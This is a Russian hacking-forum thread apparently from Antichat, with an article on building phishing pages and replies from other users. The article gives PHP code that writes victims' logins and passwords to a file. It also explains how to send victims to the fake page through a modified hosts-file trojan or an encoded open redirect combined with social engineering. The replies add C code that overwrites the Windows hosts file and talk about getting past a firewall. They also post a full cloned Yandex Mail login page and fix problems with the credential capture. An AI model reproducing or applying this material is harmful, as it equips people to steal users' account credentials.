Форум АНТИЧАТ - Все о фейках

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)

- - Все о фейках (https://forum.antichat.xyz/showthread.php?t=39047)

Все о фейках

Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий
Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая.
Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена.....
1.Задача
Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала.
Дальше нужно найти форму с нашей авторизацией
2.Практика
Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html
_http://www.opennet.ru/base/dev/html_form.txt.html
Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями.

Код HTML:

<form action="1.php" method="POST"> 

    <input type="text" name="login"> 

    <input type="password" name="pass"> 

    <select name="dom"><option value="mail.ru">@mail.ru</option> 

    </select> 

    <br > <input type="submit" value="Войти"> 



    </form>

Теперь дописываем так,что бы пароли сохранялись у нас:)

PHP код:


		
			
if(@$_POST['login']){    условие

$fp = fopen ("file.txt", "a"); открытие файла

fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n");  пишем в файл данные которые ввел юзер на фейковой страничке 

fclose ($fp); закрываем файл.

Про работу с файлами на php можно прочитать тут
2.Подводный камень
Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально?
Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам.

В файл hosts добавлены следующие строки:

61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 www.mir5173.com
61.129.75.124 ert0003.e76.163ns.com
219.147.204.249 www.chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com

Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера.
Троян называется Trojan.Win32. Qhost.hq
Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
на свои допустим
127.0.0.1 mail.ru
Да и самому такой вирус написать не особо сложно
Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой
Можно использовать редирект допустим от тех же служб mail.ru.
Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит:)
Но можно придать еше более красивый вид :
известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса
Кодируем forum.antichat.ru и получаем что то вроде
y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61
Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером.
4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема...
4.Заключение
Старался охватить все что знаю про фейки,но уверен что это далеко не все поэтому буду по ходу дописывать,особенно про способы подмены ip.
Спасибо за внимание,удачного фишинга=)
Пишем замечания

читал не давно на геймерском форуме, ты там запостил. . . Статья так себе, нового нету для меня, но для других может откроет. Интересно было почитать ;)

А чо с оутпостом делать будешь, который сразу на*** пошлет твоего троя при попытке изменить хостс?

Можно приглушить пробовать,замаскировать самого троя.

Код:

#include <conio.h>

#include <stdio.h>

FILE *f;

int x=1000;

void main ()

{

clrscr ();

f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\hosts","w");

fprintf (f,"%i",x);

fclose (f);

}

Вот накатал по шустряку ,у кого норм фаер стоит откомпильте запустите pLz

Аутпост кричит((Его только асемблером в доверенный процесс втираться или еще как можно?

Делаю фэйк для mail.yandex.ru...

Цитата:

<?
header("Content-Type:text/html;charset=windows-1251");
?><html lang="ru"><head><title>Яндекс.Почта</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico">
<link rel="stylesheet" type="text/css" href="files/common.css">
<link rel="stylesheet" type="text/css" href="files/mail-common.css">
<link rel="stylesheet" type="text/css" href="files/mail-login.css">
<style type="text/css"></style>
<script type="text/javascript">var fromMail = false;</script><script type="text/javascript" src="http://passport.yandex.ru/passport?mode=testloginjs&id42426765"></script>
<script type="text/javascript" src="files/index_main.js"></script></head>
<body style="background-image:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=yandex_mail/?id42426765)">
<table class="layout root"><tr><td class="layout content"><div align="center"><a href="http://www.yandex.ru/">
<img src="files/yandex.gif" alt="Яndex" width="136" height="83"></a></div>
<table class="layout main" width="100%">
<tr class="layout" valign="top">
<td class="features layout">
<div id="featuresCell">
<h2>Почта Яндекса — это:</h2>
<p class="plus big">
<span><a href="http://mail.yandex.ru/unlimited">Бесконечный ящик</a></span>
<br>Вы можете не думать о том, сколько места занимают ваши письма.</p>
<p class="plus no-spam"><span><a href="http://help.yandex.ru/mail/?id=288423">Отсутствие спама</a></span>
<br><a href="http://so.yandex.ru/">
<img src="files/logo_so.gif" alt="Спамооборона" title="Спамооборона" style="margin: 3px 15px 0 10px;" align="right">
</a>Ваш почтовый ящик надежно защищен программой «<a href="http://so.yandex.ru/">Спамооборона</a>».<br></p>
<p class="plus revolutional">
<span><a href="http://mail.yandex.ru/pda_info">Мобильная версия</a></span>
<br>Для смартфонов, коммуникаторов и КПК.</p>
<p class="plus red">
<span><a href="http://help.yandex.ru/mail/?id=288215" target="_blank">Защита от вирусов</a></span>
<br><a target="_blank" href="http://www.drweb.com/">
<img src="files/drweb2.gif" alt="Dr.Web" title="Dr.Web" align="right" style="margin: 3px 0 0 10px;">
</a>Все письма проверяются антивирусной программой «<a href="http://www.drweb.com" target="_blank">Dr.Web</a>».</p></div></td>
<td id="loginForm" class="form layout">
<div class="tl">
<div class="tr">
<div class="bl">
<div class="br">
<form action="1.php" method="post" name="MainLogin" id="loginform">
<img src="files/heading.gif" alt="Почта" width="136" height="36" style="margin: 15px 0 10px 0;">
<div class="input login">
<label for="inputLogin">логин:</label>
<br><input type="text" name="login" id="inputLogin" tabindex="1"></div>
<div class="input passwd">
<label for="inputPassword">пароль:</label>
<br><input type="password" name="passwd" id="inputPassword" tabindex="2"></div>
<p style="text-align: center;">
<label for="twoweeks">
<input type="checkbox" id="twoweeks" name="twoweeks" value="yes" autocomplete="no" tabindex="3" style="vertical-align: middle;"> запомнить меня</label></p>
<div><input type="hidden" name="retpath" value="http://mail.yandex.ru/?from=mail&r=id35388573">
<input type="submit" value="Войти" class="hugeBtn" tabindex="4"></div>
<p class="forgotten-link"><a href="http://passport.yandex.ru/passport?mode=remember" tabindex="5">
<span>Вспомнить пароль</span></a>
<br><br><a href="http://passport.yandex.ru/passport?mode=register&msg=mail&retpath=ht tp://mail.yandex.ru/?from=mail&r=id35388573" class="new_mail">
<span>Заведите почту на Яндексе</span></a></p></form>
<script type="text/javascript" src="files/forcehttps.js"></script></div></div></div></div></td>
<td class="dignity layout">
<div id="dignityCell">
<h2>Почтовая фишка № 14</h2>
<p><img src="files/marka14.gif" width="162" height="101" alt="Адресная книга"></p>
<p>Умная адресная книга подсказывает адреса при создании письма, причем она знает, что фамилия «Шендерович» может писаться латиницей как Shenderovitch, Schenderovich и дюжиной других вариантов.</p></div></td></tr></table></td></tr>
<tr><td class="layout bottom">
<div id="tuning" class="tuning sys-font hidden">
<p><span id="tips_hide" class="pseudo-link hidden">Убрать информацию слева и справа</span>
<span id="tips_show" class="pseudo-link hidden">Показать информацию</span></p></div>
<div class="footer">
<hr><p class="copy">Чистая почта © 2001—2007 «<a href="http://www.yandex.ru/">Яндекс</a>»
<br><a href="http://feedback.yandex.ru/?from=webmail">Обратная связь</a> ·
<a href="http://stat.yandex.ru/stats.xml?ProjectID=2">Статистика</a> ·
<a href="http://advertising.yandex.ru/mail.xml">Реклама</a></p>
<div class="pda_link">
<a href="/pda">Мобильная версия</a></div>
<div id="made-in" class="made">
<a href="http://www.artlebedev.ru/">
<img src="files/logo-artlebedev.gif" width="90" height="37" alt="art. lebedev"></a> Дизайн —<br> <a href="http://www.artlebedev.ru/">Студия Артемия Лебедева</a></div>
<br clear="all"></div></td></tr></table>
<script type="text/javascript">init(false);</script></body></html>

Создал файл 1.php прописал туда

Цитата:

<?php
if(@$_POST['login']){ условие
$fp = fopen ("file.txt", "a"); открытие файла
fwrite ($fp, "$_POST[passwd] : $_POST[login] \n"); пишем в файл данные которые ввел юзер на фейковой страничке
fclose ($fp); закрываем файл.
?>

И создал файл file.txt прохожу авторизацию на фэйк чтранице но пароли в file.txt Не сохраняются... В чём может быть ошибка?

Проверь правильность написание логин и пасс в 1.php регистр тоже важен.
+ Вроде рядом с полями логина и пароля надо жиддены удалять :\
+ файл фейка, 1.php и file.txt должны иметь значния 777 - ВАЖНО! (скорее всего из-за этого)

Всё делаю как написано, но по нажатию кнопки войти меня перекидывает на страницу http://xxxx.jino-net.ru/1.php
Что делать?

настраивать 1.php